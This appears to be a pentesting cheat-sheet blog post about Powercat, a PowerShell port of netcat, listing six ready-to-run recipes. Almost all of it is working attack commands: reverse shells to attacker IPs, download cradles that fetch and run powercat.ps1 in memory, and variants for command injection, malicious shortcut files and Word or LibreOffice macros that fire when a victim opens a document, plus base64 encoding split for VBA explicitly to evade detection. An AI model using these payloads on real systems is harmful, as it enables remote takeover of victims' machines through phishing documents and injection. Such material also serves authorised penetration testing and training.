ToolsFebruary 9, 20262 min readby 0xt0pus

Powercat

PowerShell implementation of netcat for reverse shells and file transfers

#reverse-shell#windows#powershell

powercat

Description

Powercat is the PowerShell implementation of netcat. It can be used to create reverse shells, bind shells, and transfer files, all from PowerShell. It is especially useful for Windows targets where netcat is not available. It is typically downloaded and executed in memory using a PowerShell download cradle. GitHub: https://github.com/besimorhino/powercat

Usage 1: Basic Reverse Shell

Connect back to the attacker with a reverse shell, executing cmd as the shell.

Command:

powercat -c <attacker-ip> -p 9999 -e cmd;

Usage 2: Download and Execute Reverse Shell (One-Liner)

Download powercat.ps1 into memory and immediately execute a reverse shell back to the attacker. This is the most common usage pattern.

Command:

iex (New-Object Net.WebClient).DownloadString('http://192.168.45.228/powercat.ps1');powercat -c 192.168.45.228 -p 9999 -e powershell;

Usage 3: Reverse Shell via cmd /c (For Command Injection / Macros)

Use cmd /c to launch PowerShell, download powercat, and execute a reverse shell. Useful in command injection scenarios or when executing from a non-PowerShell context.

Command:

cmd /c powershell IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.45.154/powercat.ps1');powercat -c 192.168.45.154 -p 135 -e powershell

Usage 4: Reverse Shell via Windows Library File / Shortcut (.lnk)

Used in client-side attacks with Windows Library files. Create a shortcut that downloads powercat and starts a reverse shell when the victim clicks it.

Command:

powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.152:8000/powercat.ps1');powercat -c 192.168.45.152 -p 4444 -e powershell"

Usage 5: Reverse Shell via Word/ODT Macro

Used inside a VBA or LibreOffice macro to get a reverse shell when the victim opens a malicious document. The shell() function wraps the PowerShell download cradle.

Command:

shell(cmd /c powershell IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.45.154/powercat.ps1');powercat -c 192.168.45.154 -p 135 -e powershell)

Usage 6: Base64-Encoded Reverse Shell for Macros

Encode the powercat download cradle in base64 and embed it in a Word macro to evade detection. The encoded payload is split into 50-character chunks in VBA.

Command (PowerShell command to encode):

IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.2/powercat.ps1');powercat -c 192.168.119.2 -p 4444 -e powershell

Python Script to Split Base64 for VBA Macro:

str = "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGUAdwA..."

n = 50

for i in range(0, len(str), n):
	print("Str = Str + " + '"' + str[i:i+n] + '"')